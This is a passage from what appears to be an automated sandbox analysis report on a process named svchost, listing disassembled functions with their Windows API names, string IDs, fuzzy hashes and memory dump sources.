                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Thread$CreatePriority
                                      • String ID: CreateThread failed
                                      • API String ID: 2610526550-3849766595
                                      • Opcode ID: f3f7f80d4933b12da82244f1bfbbbe9cf8b675e49d8c8317c5dcc956099d30eb
                                      • Instruction ID: dc63d505827b2f9585d1296e82169488bad44d98afe92135f98a75487b61fae6
                                      • Opcode Fuzzy Hash: f3f7f80d4933b12da82244f1bfbbbe9cf8b675e49d8c8317c5dcc956099d30eb
                                      • Instruction Fuzzy Hash: B511A031A18A8AC2EB00DF14F9402BA73B1FF84794F544535DE8D8A669EF3CE596C780
                                      Function 00007FF669AC8CEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: DirectoryInitializeMallocSystem
                                      • String ID: riched20.dll
                                      • API String ID: 174490985-3360196438
                                      • Opcode ID: a3d624d86219b46f3ab891c8d3dca2a181e167ce5578f5fb4ad5dabd9666b930
                                      • Instruction ID: b46b024a075a020c6bed4dad7948ebfbb3e1749d548620aa592e859dcce1e492
                                      • Opcode Fuzzy Hash: a3d624d86219b46f3ab891c8d3dca2a181e167ce5578f5fb4ad5dabd9666b930
                                      • Instruction Fuzzy Hash: A8F04F72518A85C2EB009F60E8541BEB7B0FF89754F440135ED8D8A754DFBCD148CB40
                                      Function 00007FF669AC8AA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: AutoCompleteFindWindow
                                      • String ID: Edit
                                      • API String ID: 4260060072-554135844
                                      • Opcode ID: 0bf6792ba6b16c54987e888777afc7d46ebe88a53e7a22299ffe9b7451d3dbc3
                                      • Instruction ID: 08d397cb996889eac24cd1c6f84c4ccc29f771b9fbb42aa3d1be67fd65ad9e69
                                      • Opcode Fuzzy Hash: 0bf6792ba6b16c54987e888777afc7d46ebe88a53e7a22299ffe9b7451d3dbc3
                                      • Instruction Fuzzy Hash: 3EE04F51E08747C2FF559F6669506F663B06FAE745F4C5430CD0E9E2519E3CE0998390
                                      Function 00007FF669ACA134 Relevance: 4.6, APIs: 3, Instructions: 120registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CloseOpen_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 2726353707-0
                                      • Opcode ID: f17db2da33f98faead7ef3021073b097f4d7377557522e44b45a10ce9a79b3e1
                                      • Instruction ID: 228609d552826a6202d6aa8887f79aa21d580a5c9290adae8a2fd4ad19ec4921
                                      • Opcode Fuzzy Hash: f17db2da33f98faead7ef3021073b097f4d7377557522e44b45a10ce9a79b3e1
                                      • Instruction Fuzzy Hash: 4A419A62B14A16CAEB60CF75D9416BD33B1FB48B98F049531DE5DABB98DE38D481C340
                                      Function 00007FF669AA1754 Relevance: 4.6, APIs: 3, Instructions: 117COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Concurrency::cancel_current_task__std_exception_copy_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 2371198981-0
                                      • Opcode ID: 81b04a57050c804bf2220a5a3d270367df96f0cba2c3b757bd24458c94084a57
                                      • Instruction ID: 8f4349cf981fcb86607d499b8c2a022a84b023469cccbdcb6670ab772a189359
                                      • Opcode Fuzzy Hash: 81b04a57050c804bf2220a5a3d270367df96f0cba2c3b757bd24458c94084a57
                                      • Instruction Fuzzy Hash: 9B41C361B08686D3EA149F62E4442B9B3B5EB08BE4F544631DE6C8FBD5EE7CE085C344
                                      Function 00007FF669AB1534 Relevance: 4.6, APIs: 3, Instructions: 109fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 2272807158-0
                                      • Opcode ID: cbe05c6f41b36f102e2b904fb475d20df200c29fe6038046e5b0e417de8fcbb7
                                      • Instruction ID: 1113a6b84a1607071b402caabf6341061570b9443384ceecc46013909dab0b71
                                      • Opcode Fuzzy Hash: cbe05c6f41b36f102e2b904fb475d20df200c29fe6038046e5b0e417de8fcbb7
                                      • Instruction Fuzzy Hash: DD41AD62A18685C6EB208F25E44427D77F0FB85BB8F105725DEAD4AAD9DF3CD4818700
                                      Function 00007FF669AD268C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                      • String ID:
                                      • API String ID: 3251591375-0
                                      • Opcode ID: 16fcc6d8014ebe9b95963f248a73e7089ea4c55891c651092eebe75313f1c669
                                      • Instruction ID: f0f283ab0ab52b08da1f3188813e6258996685aa891e9a5f3d85770c2240d96f
                                      • Opcode Fuzzy Hash: 16fcc6d8014ebe9b95963f248a73e7089ea4c55891c651092eebe75313f1c669
                                      • Instruction Fuzzy Hash: 88310925A0C283C2FA64AF6894653B932F1AF45744F444438EE4ECF7E7DE2DA90ED251
                                      Function 00007FF669AA255C Relevance: 4.6, APIs: 3, Instructions: 77COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 2176759853-0
                                      • Opcode ID: 3190c73dd7f0bb3a6cb742ca0208c4183a88647e9d1f2705cf460e2263798c2f
                                      • Instruction ID: 432f571694954dd13d86f2079efa37879fcf7f0483a03e073cc38128b26f6dc0
                                      • Opcode Fuzzy Hash: 3190c73dd7f0bb3a6cb742ca0208c4183a88647e9d1f2705cf460e2263798c2f
                                      • Instruction Fuzzy Hash: 6E319E62A28B8682EA148F65A54017AB3B0FBC9BD0F145336EF9D47B95DF3CE1918740
                                      Function 00007FF669AB3108 Relevance: 4.6, APIs: 3, Instructions: 64COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 1203560049-0
                                      • Opcode ID: c8c6e0c2b0d9cb8ef71824fc15a08c7ddbb49ec0023c59ee185242b0c6f6144d
                                      • Instruction ID: b226d4adb608a49ae3decff8d64e712fb28d0fa4ca6baaa2ff810acb82d92639
                                      • Opcode Fuzzy Hash: c8c6e0c2b0d9cb8ef71824fc15a08c7ddbb49ec0023c59ee185242b0c6f6144d
                                      • Instruction Fuzzy Hash: 3821B562B18A86C2EA20DF25E44127D73F4FF88794F105331EEDD8A699EF3CD5858600
                                      Function 00007FF669AB257C Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3118131910-0
                                      • Opcode ID: ca7f2cad624a123dd3b671b9aca72798331b070848934483982a09eb1cead94d
                                      • Instruction ID: 0b260e7ad71f7512aad18ee9a9d92a88c28a6b9c67fa05697afb6ea84edabc16
                                      • Opcode Fuzzy Hash: ca7f2cad624a123dd3b671b9aca72798331b070848934483982a09eb1cead94d
                                      • Instruction Fuzzy Hash: 4221B262A18786C1EA20CF28E45116E73F0FFD8B94F101331EE9D8AAA9EF3CD541C600
                                      Function 00007FF669AB2680 Relevance: 4.6, APIs: 3, Instructions: 59COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 1203560049-0
                                      • Opcode ID: 9bfc93c056ba89222d5a42510e3e472ad13f6330e180e5838c0227c6c227b7e6
                                      • Instruction ID: 2a2f9132db33111a0f623dddbea5532579a98f3b7e8ea6f3b781cc8753740214
                                      • Opcode Fuzzy Hash: 9bfc93c056ba89222d5a42510e3e472ad13f6330e180e5838c0227c6c227b7e6
                                      • Instruction Fuzzy Hash: A4219262E18A85C2EA10DF28E45512E73F1FBD8794F100332EEAD8BA99DF3CD5818704
                                      Function 00007FF669ADAEA4 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: 52933b5126259a84873ed224b23ac546879e6639a0a69e10b2fe31aad4917163
                                      • Instruction ID: 73ce7ff943dd0f089548f1cc57401f9d9277b890fd74bb5ea3ea32713ac7f2c2
                                      • Opcode Fuzzy Hash: 52933b5126259a84873ed224b23ac546879e6639a0a69e10b2fe31aad4917163
                                      • Instruction Fuzzy Hash: 0BE09221B08756C6FA546F65988527932B3AF88B56F145438CC0A9A392CE3DA84D9241
                                      Function 00007FF669AA3EF4 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 309COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID: R
                                      • API String ID: 3668304517-1466425173
                                      • Opcode ID: f8697226b86766db27669fc06746c4b8cc90a6edc3a3a8ae6b855d0951e54e35
                                      • Instruction ID: c952b1a32cfc07f1595139233361309b56202bee83b039866929cd9ed36f969f
                                      • Opcode Fuzzy Hash: f8697226b86766db27669fc06746c4b8cc90a6edc3a3a8ae6b855d0951e54e35
                                      • Instruction Fuzzy Hash: FED18C22B08682D7EB688F2996402B9B7F5FB55B84F044035EF5D8B7A5CF3CE4658710
                                      Function 00007FF669AA43EC Relevance: 3.1, APIs: 2, Instructions: 126COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: 7a00cbce75fcb2630a89b87c22264d9d21c0623f02072ce0e5287556a19477fc
                                      • Instruction ID: 9fa74a3ea8142ad6e8c804ecb2c1d48adadb153c3ae73dc470edb22d9a7f200d
                                      • Opcode Fuzzy Hash: 7a00cbce75fcb2630a89b87c22264d9d21c0623f02072ce0e5287556a19477fc
                                      • Instruction Fuzzy Hash: 01417B62F14652C7FB10DFB5D8412BD33B1AF45B98F144235EE1DABADADE38A4828300
                                      Function 00007FF669AB1B3C Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastPointer
                                      • String ID:
                                      • API String ID: 2976181284-0
                                      • Opcode ID: 7e2dea938e983f45b81d1208f1a86833f757bef61826bd7ee1cd8c41ffdbe08d
                                      • Instruction ID: 984d07c8e730849c8b0e9fed1537c62d2472491856ae26aa7f1c24ccd61e9bad
                                      • Opcode Fuzzy Hash: 7e2dea938e983f45b81d1208f1a86833f757bef61826bd7ee1cd8c41ffdbe08d
                                      • Instruction Fuzzy Hash: B6318222B1969AC6EAA44F69D5946B933F4BF05BD4F140132DE1DCB7D8EF2CE8528300
                                      Function 00007FF669AA241C Relevance: 3.1, APIs: 2, Instructions: 83COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Item_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 1746051919-0
                                      • Opcode ID: 9347057ea0fe5049396486d5cd20caaf911be9976955e2a818b816b586ee0dfb
                                      • Instruction ID: 5da898dd7c30324ed703b965076c44577dc72272e470b78ecad5ccd57ee16b84
                                      • Opcode Fuzzy Hash: 9347057ea0fe5049396486d5cd20caaf911be9976955e2a818b816b586ee0dfb
                                      • Instruction Fuzzy Hash: 4231E322E1878283EA108F25E45537A73B0FF84794F505235EE9C4BB96DF3CE5958740
                                      Function 00007FF669AB1E80 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: File$BuffersFlushTime
                                      • String ID:
                                      • API String ID: 1392018926-0
                                      • Opcode ID: 1daf210f7d1e71829005616e7aeefb4b91ac6c2890f93594a25159253e67cee3
                                      • Instruction ID: de1c028fff3e229323f4c0df312318bf5412d93d71339207ae2e5a0b60303cf4
                                      • Opcode Fuzzy Hash: 1daf210f7d1e71829005616e7aeefb4b91ac6c2890f93594a25159253e67cee3
                                      • Instruction Fuzzy Hash: 7021D322E0D78AD5EE618E52D8017BA77F0AF01B98F144131DE4C8A399EF3CE996C300
                                      Function 00007FF669AD11A0 Relevance: 3.1, APIs: 2, Instructions: 75memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • DloadMakePermanentImageCommit.DELAYIMP ref: 00007FF669AD1215
                                      • VirtualProtect.KERNELBASE(?,?,?,?,00000000,00007FF669AD0F96,?,?,?,00007FF669AD137D), ref: 00007FF669AD126E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CommitDloadImageMakePermanentProtectVirtual
                                      • String ID:
                                      • API String ID: 1359380325-0
                                      • Opcode ID: d7065fdead552cd7c24bae6690dff7b267eb41f4dd761d5dc4f4ae79aff033b5
                                      • Instruction ID: af4b9d4422a0f610d6dcdd63ff6f4c6e5e962abc0b600bea34d6eb3b90615b7a
                                      • Opcode Fuzzy Hash: d7065fdead552cd7c24bae6690dff7b267eb41f4dd761d5dc4f4ae79aff033b5
                                      • Instruction Fuzzy Hash: 98219421A09652C2FE688F419640279B2F1BF89FD8F040035DE4D8FB89DE3EE54A8700
                                      Function 00007FF669AB1F60 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastPointer
                                      • String ID:
                                      • API String ID: 2976181284-0
                                      • Opcode ID: 519d35b3cfcab39ddd00e55f368a9f3a7a84d20e149430486094a922609e6412
                                      • Instruction ID: ad2bae655636425987215e7dea2bc90f62ef29efa3fca4c779cd9367231e276f
                                      • Opcode Fuzzy Hash: 519d35b3cfcab39ddd00e55f368a9f3a7a84d20e149430486094a922609e6412
                                      • Instruction Fuzzy Hash: DD117221A1864AC2EB608F25E44067977B0FB55BA4F544332EF3E9A6D8DF2CE956C340
